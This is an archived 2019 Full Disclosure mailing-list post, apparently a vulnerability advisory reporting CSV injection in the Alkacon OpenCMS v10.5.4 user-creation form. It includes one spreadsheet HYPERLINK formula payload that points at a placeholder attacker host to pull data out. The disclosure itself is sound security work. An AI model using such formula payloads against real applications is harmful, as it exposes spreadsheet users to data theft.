[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CSV Injection | Alkacon OpenCMS v10.5.4 and before

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] CSV Injection | Alkacon OpenCMS v10.5.4 and before
From: Pramod Rana <varchashva@xxxxxxxxx>
Date: Wed, 8 May 2019 16:34:26 +0530

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe";)'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for CVE, yet to receive it.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before
Next by Date: [FD] Cross Site Scripting | WolfCMS v0.8.3.1 and before
Previous by thread: [FD] Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before
Next by thread: [FD] Cross Site Scripting | WolfCMS v0.8.3.1 and before
Index(es):
- Date
- Thread